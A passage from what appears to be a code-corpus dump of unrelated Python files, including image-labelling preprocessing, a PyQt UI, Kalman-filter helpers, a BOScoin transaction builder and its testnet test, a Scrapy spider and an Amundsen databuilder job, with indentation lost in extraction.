binary_image.write(int(h).to_bytes(4, byteorder="little", signed=True))
binary_image.write(int(w).to_bytes(4, byteorder="little", signed=True))
binary_image.write(gray_img.tobytes())
binary_image.close()
def convertImgToGray(src_img, g_width = None, g_height = None):
'''
: 功能:将原始图片进行缩放转成灰度图,返回此灰度图
adaBoostApp 使用
'''
if g_width and g_height:
r_image = cv2.resize(src_img, (g_width, g_height))
else:
r_image = src_img
r_gray_image = cv2.cvtColor(r_image, cv2.COLOR_RGB2GRAY)
return r_gray_image
def os_path_check(dirs):
'''
: 功能:检查 dirs 路径是否存在,如果不存在就创建
'''
if not os.path.exists(dirs):
os.makedirs(dirs)
def slice_image(src_img, x, y, w, h):
return src_img[y:y+h, x:x+w] # 裁剪坐标为[y0:y1, x0:x1]
def p_adaBoostApp_biz(labelme_dict, positive_folder, train_set):
'''
: 功能:从 labelme_dict -> shapes 选出 label 与 train_set -> train_label 相同的 shape ,
读取 labelme_dict -> imagePath 标识的图片,切取筛选出来的 shape 集,转灰度图后,
存放二进制文件到 positive_folder -> grayscale 设定的文件夹下,将切取存放到该路径下的 /orig 下,
并将切图文件名写入 train_set -> train_folder 设定的文件夹下的 positive_path.txt;
'''
if not train_set['adaBoostApp-use']:
return
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, labelme_dict['imagePath']))
orig_img = cv2.imread(full_path)
slice_images = [] # 格式:[{'x': int, 'y': int, 'w': int, 'h': int}, ...]
for el in labelme_dict['shapes']: # 遍历 labelme 标签
if el['shape_type'] != 'rectangle':
continue
if el['label'] != train_set['train_label']:
continue
if len(el['points']) == 2: # 读取标注区域
x1, y1 = el['points'][0]
x2, y2 = el['points'][1]
x = min(x1, x2)
y = min(y1, y2)
w = abs(x2 - x1)
h = abs(y2 - y1)
slice_images.append( {'x':int(x), 'y':int(y), 'w':int(w), 'h':int(h)} )
serial = 0
for el in slice_images:
serial += 1
slice_bin_path = os.path.abspath(os.path.join(gray_path, labelme_dict['imagePath'].split('.')[0]))
slice_bin_path += '-binary-gray-' + str(serial)
slice_img = slice_image(orig_img, el['x'], el['y'], el['w'], el['h'])
gray_img = convertImgToGray(slice_img, train_set['app_pic_size']['width'], train_set['app_pic_size']['height'])
saveBinaryImages(slice_bin_path, gray_img)
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'positive_path.txt'))
f = open(txt_full_path, "a")
f.write(slice_bin_path + '\n')
f.close()
def n_adaBoostApp_biz(dir_file, negative_folder, train_set):
'''
: 功能:读取 full_path 文件,转灰度图后,
存放二进制文件到 negative_folder -> grayscale 设定的文件夹下,
并将切图文件名写入 train_set -> train_folder 设定的文件夹下的 negative_path.txt;
'''
if not train_set['adaBoostApp-use']:
return
orig_path = negative_folder['original']
gray_path = negative_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
slice_bin_path = os.path.abspath(os.path.join(gray_path, dir_file.split('.')[0])) + '-binary-gray-n'
orig_img = cv2.imread(full_path)
gray_img = convertImgToGray(orig_img, train_set['app_pic_size']['width'], train_set['app_pic_size']['height'])
saveBinaryImages(slice_bin_path, gray_img)
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'negative_path.txt'))
f = open(txt_full_path, "a")
f.write(slice_bin_path + '\n')
f.close()
def p_opencv_biz(labelme_dict, positive_folder, train_set):
'''
: 功能:从 labelme_dict -> shapes 选出 label 与 train_set -> train_label 相同的 shape ,
读取 labelme_dict -> imagePath 标识的图片,切取筛选出来的 shape集,
将 shape集 写入 train_set -> train_folder 设定的文件夹下的 metre.info;
'''
if not train_set['openCV-use']:
return
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
full_path = os.path.abspath(os.path.join(orig_path, labelme_dict['imagePath']))
orig_img = cv2.imread(full_path)
slice_images = [] # 格式:[{'x': int, 'y': int, 'w': int, 'h': int}, ...]
for el in labelme_dict['shapes']: # 遍历 labelme 标签
if el['shape_type'] != 'rectangle':
continue
if el['label'] != train_set['train_label']:
continue
if len(el['points']) == 2: # 读取标注区域
x1, y1 = el['points'][0]
x2, y2 = el['points'][1]
x = min(x1, x2)
y = min(y1, y2)
w = abs(x2 - x1)
h = abs(y2 - y1)
slice_images.append( {'x':int(x), 'y':int(y), 'w':int(w), 'h':int(h)} )
serial = 0
info = full_path + ' ' + str(len(slice_images))
for el in slice_images:
serial += 1
info += ' ' + str(el['x']) + ' ' + str(el['y']) + ' ' + str(el['w']) + ' ' + str(el['h'])
if slice_test: # 调试用
slice_img = slice_image(orig_img, el['x'], el['y'], el['w'], el['h'])
name_spts = labelme_dict['imagePath'].split('.')
slice_path = os.path.abspath(os.path.join(gray_path, name_spts[0] + '-' + str(serial) + '.' + name_spts[1]))
cv2.imwrite(slice_path, slice_img)
metre_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'metre.info'))
f = open(metre_full_path, "a")
f.write(info + '\n')
f.close()
def n_opencv_biz(full_path, negative_folder, train_set):
'''
: 功能:将 full_path 文件名写入 train_set -> train_folder 设定的文件夹下的 bg.txt;
'''
if not train_set['openCV-use']:
return
txt_full_path = os.path.abspath(os.path.join(train_set['train_folder'], 'bg.txt'))
f = open(txt_full_path, "a")
f.write(full_path + '\n')
f.close()
def p_folder_traverse(positive_folder, train_set):
'''
: 功能:遍历 positive_folder -> original 文件夹 labelme 标注的json文件
'''
orig_path = positive_folder['original']
gray_path = positive_folder['grayscale']
if not os.path.exists(orig_path):
return
if gray_path:
os_path_check(gray_path)
if not os.path.exists(orig_path):
return
for dir_file in os.listdir(orig_path):
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
if os.path.isdir(full_path): # 非文件
pass
elif dir_file.endswith('.json'): # labelme 标注文件
with open(full_path, 'r') as label_file:
label_dict = json.load(label_file)
p_opencv_biz(label_dict, positive_folder, train_set) # openCV
p_adaBoostApp_biz(label_dict, positive_folder, train_set) # adaBoostApp
else:
pass
def n_folder_traverse(negative_folder, train_set):
'''
: 功能:遍历 negative_folder -> original 文件夹 图片
'''
orig_path = negative_folder['original']
gray_path = negative_folder['grayscale']
if not os.path.exists(orig_path):
return
if gray_path:
os_path_check(gray_path)
for dir_file in os.listdir(orig_path):
full_path = os.path.abspath(os.path.join(orig_path, dir_file))
if os.path.isdir(full_path): # 非文件
pass
elif (dir_file.endswith('.png') or dir_file.endswith('.jpg') ): # 图片
n_opencv_biz(full_path, negative_folder, train_set) # openCV
n_adaBoostApp_biz(dir_file, negative_folder, train_set) # adaBoostApp
else:
pass
if __name__ == "__main__":
with open("configure.json",'r') as load_f:
cfg_dict = json.load(load_f)
p_folder_traverse(cfg_dict['positive_folder'], cfg_dict['train_set'])
n_folder_traverse(cfg_dict['negative_folder'], cfg_dict['train_set'])
``` |
{
"source": "JinhuiLee/miniPyserver",
"score": 2
} |
#### File: JinhuiLee/miniPyserver/handler.py
```python
def hello(verb, path, query):
return "Server received your " + verb + " request" + str(query) + "\r\n"
def register(urlMapper):
urlMapper["/hello"] = hello
``` |
{
"source": "jinhuli/hikyuu",
"score": 2
} |
#### File: tools/maintain/MainWindow.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(798, 573)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(0, 0, 801, 571))
self.tabWidget.setObjectName("tabWidget")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.tabWidget.addTab(self.tab_2, "")
self.tabConfig = QtWidgets.QWidget()
self.tabConfig.setObjectName("tabConfig")
self.label = QtWidgets.QLabel(self.tabConfig)
self.label.setGeometry(QtCore.QRect(40, 40, 101, 16))
self.label.setObjectName("label")
self.dataDirLineEdit = QtWidgets.QLineEdit(self.tabConfig)
self.dataDirLineEdit.setGeometry(QtCore.QRect(170, 40, 301, 20))
self.dataDirLineEdit.setObjectName("dataDirLineEdit")
self.pushButton = QtWidgets.QPushButton(self.tabConfig)
self.pushButton.setGeometry(QtCore.QRect(490, 40, 75, 23))
self.pushButton.setObjectName("pushButton")
self.label_2 = QtWidgets.QLabel(self.tabConfig)
self.label_2.setGeometry(QtCore.QRect(40, 90, 121, 16))
self.label_2.setObjectName("label_2")
self.lineEdit_2 = QtWidgets.QLineEdit(self.tabConfig)
self.lineEdit_2.setGeometry(QtCore.QRect(170, 90, 301, 20))
self.lineEdit_2.setObjectName("lineEdit_2")
self.groupBox = QtWidgets.QGroupBox(self.tabConfig)
self.groupBox.setGeometry(QtCore.QRect(30, 170, 561, 161))
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(20, 40, 473, 66))
self.widget.setObjectName("widget")
self.gridLayout = QtWidgets.QGridLayout(self.widget)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 0, 3, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem1, 1, 0, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem2, 0, 5, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 0, 1, 1, 1)
self.checkBox = QtWidgets.QCheckBox(self.widget)
self.checkBox.setObjectName("checkBox")
self.gridLayout.addWidget(self.checkBox, 0, 0, 1, 1)
self.checkBox_2 = QtWidgets.QCheckBox(self.widget)
self.checkBox_2.setObjectName("checkBox_2")
self.gridLayout.addWidget(self.checkBox_2, 0, 2, 1, 1)
self.checkBox_10 = QtWidgets.QCheckBox(self.widget)
self.checkBox_10.setObjectName("checkBox_10")
self.gridLayout.addWidget(self.checkBox_10, 0, 8, 1, 1)
self.checkBox_4 = QtWidgets.QCheckBox(self.widget)
self.checkBox_4.setObjectName("checkBox_4")
self.gridLayout.addWidget(self.checkBox_4, 2, 0, 1, 1)
self.checkBox_5 = QtWidgets.QCheckBox(self.widget)
self.checkBox_5.setObjectName("checkBox_5")
self.gridLayout.addWidget(self.checkBox_5, 2, 2, 1, 1)
self.checkBox_3 = QtWidgets.QCheckBox(self.widget)
self.checkBox_3.setObjectName("checkBox_3")
self.gridLayout.addWidget(self.checkBox_3, 0, 4, 1, 1)
self.checkBox_6 = QtWidgets.QCheckBox(self.widget)
self.checkBox_6.setObjectName("checkBox_6")
self.gridLayout.addWidget(self.checkBox_6, 2, 4, 1, 1)
self.checkBox_9 = QtWidgets.QCheckBox(self.widget)
self.checkBox_9.setObjectName("checkBox_9")
self.gridLayout.addWidget(self.checkBox_9, 0, 6, 1, 1)
self.checkBox_8 = QtWidgets.QCheckBox(self.widget)
self.checkBox_8.setObjectName("checkBox_8")
self.gridLayout.addWidget(self.checkBox_8, 2, 8, 1, 1)
self.checkBox_7 = QtWidgets.QCheckBox(self.widget)
self.checkBox_7.setObjectName("checkBox_7")
self.gridLayout.addWidget(self.checkBox_7, 2, 6, 1, 1)
spacerItem4 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem4, 0, 7, 1, 1)
self.pushButton_2 = QtWidgets.QPushButton(self.tabConfig)
self.pushButton_2.setGeometry(QtCore.QRect(490, 90, 75, 23))
self.pushButton_2.setObjectName("pushButton_2")
self.tabWidget.addTab(self.tabConfig, "")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "数据导入工具"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Tab 2"))
self.label.setText(_translate("MainWindow", "目标数据存放目录:"))
self.pushButton.setText(_translate("MainWindow", "浏览"))
self.label_2.setText(_translate("MainWindow", "通达信盘后数据目录:"))
self.groupBox.setTitle(_translate("MainWindow", "数据预加载设置"))
self.checkBox.setText(_translate("MainWindow", "日线"))
self.checkBox_2.setText(_translate("MainWindow", "周线"))
self.checkBox_10.setText(_translate("MainWindow", "年线"))
self.checkBox_4.setText(_translate("MainWindow", "1分钟线"))
self.checkBox_5.setText(_translate("MainWindow", "5分钟线"))
self.checkBox_3.setText(_translate("MainWindow", "月线"))
self.checkBox_6.setText(_translate("MainWindow", "15分钟线"))
self.checkBox_9.setText(_translate("MainWindow", "半年线"))
self.checkBox_8.setText(_translate("MainWindow", "60分钟线"))
self.checkBox_7.setText(_translate("MainWindow", "30分钟线"))
self.pushButton_2.setText(_translate("MainWindow", "浏览"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tabConfig), _translate("MainWindow", "配置"))
``` |
{
"source": "jinhwanlazy/kalman-filter-isnt-hard",
"score": 2
} |
#### File: jinhwanlazy/kalman-filter-isnt-hard/utils.py
```python
import scipy.io
from matplotlib import pyplot as plt
import numpy as np
def load_imu_data():
dt = 0.01
gyro_data = scipy.io.loadmat('./source/11.ARS/ArsGyro.mat')
acce_data = scipy.io.loadmat('./source/11.ARS/ArsAccel.mat')
ts = np.arange(len(gyro_data['wz'])) * dt
gyro = np.concatenate([
gyro_data['wx'],
gyro_data['wy'],
gyro_data['wz'],
], axis=1)
acce = np.concatenate([
acce_data['fx'],
acce_data['fy'],
acce_data['fz'],
], axis=1)
return dt, ts, gyro, acce
def load_sonar_data():
sonar_data = scipy.io.loadmat('./source/2.MovAvgFilter/SonarAlt.mat')['sonarAlt'].reshape(-1)[:500]
dt = 0.02
ts = np.arange(len(sonar_data)) * dt
return dt, ts, sonar_data[:500]
def generate_volt_data():
while True:
yield np.random.normal(14.4, 4)
def generate_pos_vel_data(dt=0.1):
pos = 0
vel = 80
while True:
w = np.random.normal(0, 10)
v = np.random.normal(0, 10)
pos += vel * dt
yield pos + v, vel
vel = 80 + w
def generate_radar_measurement_data(dt):
pos = 0
while True:
vel = np.random.normal(100, 5)
alt = np.random.normal(1000, 10)
pos = pos + vel*dt
v = np.random.normal(0, pos * 0.05)
r = (pos**2 + alt**2)**0.5 + v
yield r
def run_radar_position_estimation(kf, ts, measurements_seq):
measurements = []
estimations = []
speeds = []
altitudes = []
positions = []
for t, meas in zip(ts, measurements_seq):
kf.update(np.array([[meas]]))
state = kf.x.copy()
measurements.append(meas)
estimations.append(kf.h(state)[0, 0])
pos, spd, alt = state.reshape(3)
positions.append(pos)
speeds.append(spd)
altitudes.append(alt)
return measurements, estimations, speeds, altitudes, positions
def run_euler_attitude_estimation(kf, ts, gyro, acce):
estimations = []
for i, (g, a) in enumerate(zip(gyro, euler_from_acce(acce))):
kf.gyro = g.reshape(3, 1)
kf.update(a[:2].reshape(2, 1))
estimations.append(kf.get().reshape(1, 2))
return np.concatenate(estimations) * 180 / np.pi
def plot_xyz(ts, xyz, title=''):
fig = plt.figure(figsize=[16, 12])
fig.suptitle(title)
for i, ax, color in zip(range(xyz.shape[1]), 'xyz', 'rgb'):
fig.add_subplot(3, 1, i+1)
plt.plot(ts, xyz[:, i], color=color)
plt.ylabel(ax)
plt.xlabel('Time[sec]')
plt.show()
def plot_radar_result(ts, speeds, altitudes, positions):
def plot(ts, values, ylabel):
plt.figure(figsize=[12, 6])
plt.plot(ts, values)
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.show()
plot(ts, speeds, 'Speed[m/s]')
plot(ts, altitudes, 'Altitude[m]')
plot(ts, positions, 'Position[m]')
def plot_measurement_vs_estimation(ts, measurements, estimations, ylabel=''):
plt.figure(figsize=[12, 9])
plt.plot(ts, measurements, '--', label='measured')
plt.plot(ts, estimations, label='estimated')
plt.xlabel('Time[sec]')
plt.ylabel(ylabel)
plt.legend()
plt.show()
def euler_from_gyro(ts, gyro):
attitude = np.array([[0, 0, 0]]).T
res = np.zeros((len(ts), 3), dtype=float)
for i, (dt, pqr) in enumerate(zip(ts[1:] - ts[:-1], gyro)):
phi, theta, _ = attitude.reshape(-1)
sin_phi = np.sin(phi)
cos_phi = np.cos(phi)
cos_theta = np.cos(theta)
tan_theta = np.tan(theta)
to_euler = np.array([
[1, sin_phi * tan_theta, cos_phi * tan_theta],
[0, cos_phi, -sin_phi],
[0, sin_phi * cos_theta, cos_phi * cos_theta],
])
attitude = attitude + dt * to_euler @ pqr.reshape(3, 1)
res[i+1] = attitude.reshape(-1)
return res
def euler_from_acce(acce):
g = 9.8
theta = np.arcsin(acce[:, 0] / g)
phi = np.arcsin(-acce[:, 1] / (g * np.cos(theta)))
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
def euler_from_acce2(acce):
x, y, z = acce.T
phi = np.arctan2(y, z)
theta = np.arctan2(x, (y**2 + z**2)**0.5)
return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
``` |
{
"source": "jinhwanlazy/py-boscoin-base",
"score": 2
} |
#### File: py-boscoin-base/boscoin_base/builder.py
```python
from .horizon import HORIZON_LIVE, HORIZON_TEST, HORIZON_STELLAR
from .horizon import Horizon
from .keypair import Keypair
from .memo import *
from .network import NETWORKS, Network
from .operation import *
from .transaction import Transaction
from .transaction_envelope import TransactionEnvelope as Te
from .utils import SignatureExistError
from .federation import *
class Builder(object):
""" build transaction and submit to horizon.
"""
def __init__(self, secret=None, address=None, horizon=None, network=None, sequence=None):
if secret:
self.key_pair = Keypair.from_seed(secret)
self.address = self.key_pair.address().decode()
else:
self.key_pair = None
self.address = None
if address is None and secret is None:
raise Exception('No Stellar address afforded.')
if address is not None and secret is None:
self.address = address
self.key_pair = None
if network:
network = network.upper()
if network not in ['PUBLIC', 'STELLAR']:
network = 'TESTNET'
self.network = network
if horizon:
self.horizon = Horizon(horizon)
elif network == 'PUBLIC':
self.horizon = Horizon(HORIZON_LIVE)
elif network == 'STELLAR':
self.horizon = Horizon(HORIZON_STELLAR)
else:
self.horizon = Horizon(HORIZON_TEST)
if sequence:
self.sequence = sequence
elif self.address:
self.sequence = self.get_sequence()
else:
self.sequence = None
self.ops = []
self.time_bounds = []
self.memo = NoneMemo()
self.fee = None
self.tx = None
self.te = None
def append_op(self, operation):
if operation not in self.ops:
self.ops.append(operation)
return self
def append_create_account_op(self, destination, starting_balance, source=None):
opts = {
'source': source,
'destination': destination,
'starting_balance': str(starting_balance)
}
op = CreateAccount(opts)
return self.append_op(op)
def append_trust_op(self, destination, code, limit=None, source=None):
line = Asset(code, destination)
if limit is not None:
limit = str(limit)
opts = {
'source': source,
'asset': line,
'limit': limit
}
op = ChangeTrust(opts)
return self.append_op(op)
def append_payment_op(self, destination, amount, asset_type='BOS',
asset_issuer=None, source=None):
asset = Asset(code=asset_type, issuer=asset_issuer)
opts = {
'source': source,
'destination': destination,
'asset': asset,
'amount': str(amount)
}
op = Payment(opts)
return self.append_op(op)
def append_path_payment_op(self, destination, send_code, send_issuer, send_max,
dest_code, dest_issuer, dest_amount, path, source=None):
# path: a list of asset tuple which contains code and issuer, [(code,issuer),(code,issuer)]
# for native asset you can delivery ('bos','')
send_asset = Asset(send_code, send_issuer)
dest_asset = Asset(dest_code, dest_issuer)
assets = []
for p in path:
assets.append(Asset(p[0], p[1]))
opts = {
'source': source,
'destination': destination,
'send_asset': send_asset,
'send_max': str(send_max),
'dest_asset': dest_asset,
'dest_amount': str(dest_amount),
'path': assets
}
op = PathPayment(opts)
return self.append_op(op)
def append_allow_trust_op(self, trustor, asset_code, authorize, source=None):
opts = {
'source': source,
'trustor': trustor,
'asset_code': asset_code,
'authorize': authorize
}
op = AllowTrust(opts)
return self.append_op(op)
def append_set_options_op(self, inflation_dest=None, clear_flags=None, set_flags=None,
master_weight=None, low_threshold=None, med_threshold=None,
high_threshold=None, home_domain=None, signer_address=None,
signer_type=None, signer_weight=None, source=None,
):
opts = {
'source': source,
'inflation_dest': inflation_dest,
'clear_flags': clear_flags,
'set_flags': set_flags,
'master_weight': master_weight,
'low_threshold': low_threshold,
'med_threshold': med_threshold,
'high_threshold': high_threshold,
'home_domain': bytearray(home_domain, encoding='utf-8') if home_domain else None,
'signer_address': signer_address,
'signer_type': signer_type,
'signer_weight': signer_weight
}
op = SetOptions(opts)
return self.append_op(op)
def append_hashx_signer(self, hashx, signer_weight, source=None):
return self.append_set_options_op(signer_address=hashx, signer_type='hashX', signer_weight=signer_weight,
source=source)
def append_pre_auth_tx_signer(self, pre_auth_tx, signer_weight, source=None):
return self.append_set_options_op(signer_address=pre_auth_tx, signer_type='preAuthTx',
signer_weight=signer_weight, source=source)
def append_manage_offer_op(self, selling_code, selling_issuer,
buying_code, buying_issuer,
amount, price, offer_id=0, source=None):
selling = Asset(selling_code, selling_issuer)
buying = Asset(buying_code, buying_issuer)
opts = {
'source': source,
'selling': selling,
'buying': buying,
'amount': str(amount),
'price': price,
'offer_id': offer_id,
}
op = ManageOffer(opts)
return self.append_op(op)
def append_create_passive_offer_op(self, selling_code, selling_issuer,
buying_code, buying_issuer,
amount, price, source=None):
selling = Asset(selling_code, selling_issuer)
buying = Asset(buying_code, buying_issuer)
opts = {
'source': source,
'selling': selling,
'buying': buying,
'amount': str(amount),
'price': price,
}
op = CreatePassiveOffer(opts)
return self.append_op(op)
def append_account_merge_op(self, destination, source=None):
opts = {
'source': source,
'destination': destination
}
op = AccountMerge(opts)
return self.append_op(op)
def append_inflation_op(self, source=None):
opts = {'source': source}
op = Inflation(opts)
return self.append_op(op)
def append_manage_data_op(self, data_name, data_value, source=None):
opts = {
'source': source,
'data_name': data_name,
'data_value': data_value
}
op = ManageData(opts)
return self.append_op(op)
def add_memo(self, memo):
self.memo = memo
return self
def add_text_memo(self, memo_text):
memo_text = TextMemo(memo_text)
return self.add_memo(memo_text)
def add_id_memo(self, memo_id):
memo_id = IdMemo(memo_id)
return self.add_memo(memo_id)
def add_hash_memo(self, memo_hash):
memo_hash = HashMemo(memo_hash)
return self.add_memo(memo_hash)
def add_ret_hash_memo(self, memo_return):
memo_return = RetHashMemo(memo_return)
return self.add_memo(memo_return)
def add_time_bounds(self, time_bounds):
return self.time_bounds.append(time_bounds)
def federation_payment(self, fed_address, amount, asset_type='BOS',
asset_issuer=None, source=None):
fed_info = federation(fed_address, 'name')
if not fed_info:
raise FederationError('can not get valid federation response. ')
self.append_payment_op(fed_info['account_id'], amount, asset_type,
asset_issuer, source)
memo_type = fed_info.get('memo_type')
if memo_type is not None and memo_type in ('text', 'id', 'hash'):
getattr(self, 'add_' + memo_type + '_memo')(fed_info['memo'])
def gen_tx(self):
if not self.address:
raise Exception('Transaction does not have any source address ')
if not self.sequence:
raise Exception('have no sequence, maybe not funded?')
tx = Transaction(
self.address,
opts={
'sequence': self.sequence,
'timeBounds': self.time_bounds,
'memo': self.memo,
'fee': self.fee if self.fee else 10000 * len(self.ops),
'operations': self.ops,
},
)
self.tx = tx
return tx
def gen_te(self):
if self.tx is None:
self.gen_tx()
te = Te(self.tx, opts={'network_id': self.network})
if self.te:
te.signatures = self.te.signatures
self.te = te
return te
def gen_xdr(self):
if self.tx is None:
self.gen_te()
return self.te.xdr()
def gen_compliance_xdr(self):
sequence = self.sequence
self.sequence = '-1' # sequence number shoule be '0' here. so the pass one is '-1'
tx_xdr = self.gen_tx().xdr()
self.sequence = sequence
return tx_xdr
def import_from_xdr(self, xdr):
te = Te.from_xdr(xdr)
te.network_id = Network(NETWORKS[self.network]).network_id()
self.te = te
self.tx = te.tx # with a different source or not .
self.ops = te.tx.operations
self.address = te.tx.source
self.sequence = te.tx.sequence - 1
self.time_bounds = te.tx.time_bounds
self.memo = te.tx.memo
def sign(self, secret=None):
key_pair = self.key_pair if not secret else Keypair.from_seed(secret)
self.gen_te()
try:
self.te.sign(key_pair)
except SignatureExistError:
raise
def sign_preimage(self, preimage):
''' preimage must be a unicode string
'''
if self.te is None:
self.gen_te()
try:
self.te.sign_hashX(preimage)
except SignatureExistError:
raise
def submit(self):
try:
return self.horizon.submit(self.gen_xdr())
except Exception as e:
raise e
# raise Exception('network problem')
def next_builder(self):
sequence = str(int(self.sequence) + 1)
next_builder = Builder(horizon=self.horizon.horizon, network=self.network, sequence=sequence)
next_builder.address = self.address
next_builder.key_pair = self.key_pair
return next_builder
def get_sequence(self):
if not self.address:
raise Exception('no address provided')
try:
address = self.horizon.account(self.address)
except:
raise Exception('network problem')
return address.get('sequence')
```
#### File: py-boscoin-base/tests/test_horizon.py
```python
import requests
import json
from boscoin_base.keypair import Keypair
from boscoin_base.memo import *
from boscoin_base.operation import *
from boscoin_base.builder import HORIZON_TEST
from boscoin_base.horizon import Horizon
horizon = Horizon()
class TestMethods:
def __init__(self):
kp = Keypair.random()
self.fee = 100
self.address = kp.address().decode('ascii')
self.seed = kp.seed().decode('ascii') or None
fund(self.address)
def make_envelope(self, *args, **kwargs):
from boscoin_base.transaction import Transaction
from boscoin_base.keypair import Keypair
from boscoin_base.transaction_envelope import TransactionEnvelope as Te
opts = {
'sequence': horizon.account(self.address)['sequence'],
'fee': self.fee * len(args)
}
for opt, value in kwargs.items():
opts[opt] = value
tx = Transaction(source=self.address, opts=opts)
for count, op in enumerate(args):
tx.add_operation(operation=op)
envelope = Te(tx=tx, opts={"network_id": "TESTNET"})
signer = Keypair.from_seed(seed=self.seed)
envelope.sign(keypair=signer)
envelope_xdr = envelope.xdr()
print(envelope_xdr)
return envelope_xdr
def test_submit(self):
envelope_xdr = self.make_envelope(Payment({
'destination': self.address,
'asset': Asset.native(),
'amount': "0.0001618"
}))
response = horizon.submit(envelope_xdr)
assert 'hash' in response
def fund(address):
for attempt in range(3):
r = requests.get('https://friendbot.stellar.org/?addr=' +
address) # Get 10000 lumens
t = r.text
try:
assert 'hash' in json.loads(
t) or 'op_already_exists' in json.loads(t)
return True
except AssertionError:
pass
raise Exception("fund failed")
``` |
{
"source": "Jinhx128/scrapy_demo",
"score": 3
} |
#### File: scrapy_demo/spiders/aosun_spider.py
```python
import scrapy
from scrapy_demo.items import AosunItem
class AosunSpider(scrapy.Spider):
name = 'aosun_spider' # 定义爬虫的名称,用于区别spider,该名称必须是唯一的,不可为不同的spider设置相同的名字
allowed_domains = ['aosun.cloud'] # 定义允许爬取的域,若不是该列表内的域名则放弃抓取
custom_settings = {
'ITEM_PIPELINES': {'scrapy_demo.pipelines.AosunPipeline': 303},
}
form_data = {
'page': '1',
'rows': '4',
'isPrivate': 'false'
}
total = int(form_data['page']) * int(form_data['rows'])
base_url = 'http://aosun.cloud/api/article/getArticleList'
start_urls = [base_url] # spider在启动时爬取的入口url列表,后续的url从初始的url抓取到的数据中提取
# headers = {
# 'Host': 'aosun.cloud',
# 'Origin': 'http://aosun.cloud',
# 'Referer': 'http://aosun.cloud/',
# 'User-Agent:': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36',
# 'Content-Type': 'application/x-www-form-urlencoded',
# 'Content-Length': '1149',
# 'Connection': 'keep-alive',
# 'Accept': 'application/json, text/plain, */*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9'
# }
def start_requests(self):
# 发送post请求
for url in self.start_urls:
yield scrapy.FormRequest(url=url, method='POST', formdata=self.form_data, callback=self.parse)
def parse(self, response): # 定义回调函数,每个初始url完成下载后生成的response对象会作为唯一参数传递给parse()函数。负责解析数据、提取数据(生成Item)、以及生成需要进一步处理的url
total = response.json()['total']
articles = response.json()['info']
for article in articles:
item = AosunItem()
item['id'] = article['id']
item['title'] = article['title']
item['modifyrq'] = article['modifyrq']
item['publish_time'] = article['publishTime']
item['info'] = article['info']
item['views'] = article['views']
item['type_id'] = article['typeId']
item['is_private'] = article['isPrivate']
item['state'] = article['state']
item['info_text'] = article['infoText']
item['menu_info'] = article['menuInfo']
item['type'] = article['type']
yield item
if int(self.form_data['page']) * int(self.form_data['rows']) < total:
self.form_data['page'] = str(int(self.form_data['page']) + 1)
yield scrapy.FormRequest(url=self.start_urls[0], method='POST', formdata=self.form_data, callback=self.parse)
``` |
{
"source": "jinhyukchang/amundsendatabuilder",
"score": 2
} |
#### File: databuilder/job/job.py
```python
import logging
from pyhocon import ConfigTree # noqa: F401
from statsd import StatsClient
from databuilder import Scoped
from databuilder.job.base_job import Job
from databuilder.publisher.base_publisher import NoopPublisher
from databuilder.publisher.base_publisher import Publisher # noqa: F401
from databuilder.task.base_task import Task # noqa: F401
LOGGER = logging.getLogger(__name__)
class DefaultJob(Job):
# Config keys
IS_STATSD_ENABLED = 'is_statsd_enabled'
JOB_IDENTIFIER = 'identifier'
"""
Default job that expects a task, and optional publisher
If configured job will emit success/fail metric counter through statsd where prefix will be
amundsen.databuilder.job.[identifier] .
Note that job.identifier is part of metrics prefix and choose unique & readable identifier for the job.
To configure statsd itself, use environment variable: https://statsd.readthedocs.io/en/v3.2.1/configure.html
"""
def __init__(self,
conf,
task,
publisher=NoopPublisher()):
# type: (Task, ConfigTree, Publisher) -> None
self.task = task
self.conf = conf
self.publisher = publisher
self.scoped_conf = Scoped.get_scoped_conf(self.conf,
self.get_scope())
